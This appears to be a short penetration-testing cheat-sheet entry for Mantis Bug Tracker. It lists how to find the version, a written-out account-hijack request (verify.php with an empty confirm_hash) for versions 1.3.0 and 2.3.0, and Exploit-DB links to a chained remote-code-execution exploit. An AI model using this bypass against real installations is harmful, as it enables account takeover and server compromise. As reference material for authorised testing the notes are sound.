# mantis bugtracker

## Check Version (Authenticated)

```bash
Manage > (Help icon)
/manage_overview_page.php
```

## v1.3.0 / 2.3.0 Account Hijack (Auth Bypass)

* <https://www.exploit-db.com/exploits/41890>

```bash
/verify.php?id=1&confirm_hash=
```

## v2.3.0 RCE (with account hijack)

* <https://www.exploit-db.com/exploits/48818> (update headers)